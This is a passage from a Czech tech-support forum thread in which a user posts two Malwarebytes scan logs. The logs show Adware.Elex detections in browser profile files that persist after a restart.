Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno

-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)

Modul: 0
(Nebyly zjištěny žádné škodlivé položky)

Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)

Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)

Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)

Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)

Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)

Soubor: 9
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\SEARCHPLUGINS\59AGJA1F.XML, Smazání při restartu, [220], [387118],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Odstranění se nezdařilo, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Odstranění se nezdařilo, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Odstranění se nezdařilo, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Odstranění se nezdařilo, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Odstranění se nezdařilo, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Odstranění se nezdařilo, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Odstranění se nezdařilo, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\ZJX1FD7I.DEFAULT\SEARCHPLUGINS\59AGJA1F.XML, Smazání při restartu, [220], [387119],1.0.1702

Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)


(end)
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#15 Příspěvek od Tesla »

bylo tam nějaké mazaní po restartu, nicméně je to tam po restartu zpět:

Malwarebytes
www.malwarebytes.com

-Podrobnosti logovacího souboru-
Datum skenování: 11.04.17
Čas skenování: 8:26
Logovací soubor:
Správce: Ano

-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.96
Aktualizovat verzi balíku komponent: 1.0.1702
Licence: Zkušební

-Systémová informace-
OS: Windows 7 Service Pack 1
CPU: x64
Systém souborů: NTFS
Uživatel: System

-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 389059
Uplynulý čas: 3 min, 12 sek

-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno

-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)

Modul: 0
(Nebyly zjištěny žádné škodlivé položky)

Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)

Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)

Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)

Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)

Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)

Soubor: 9
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\SEARCHPLUGINS\59AGJA1F.XML, Žádná uživatelská akce, [220], [387118],1.0.1702
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\ZJX1FD7I.DEFAULT\SEARCHPLUGINS\59AGJA1F.XML, Žádná uživatelská akce, [220], [387119],1.0.1702

Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)


(end)
Nahoru
Zamčeno

Zpět na „Sekce pouze pro Vzorné návštěvníky“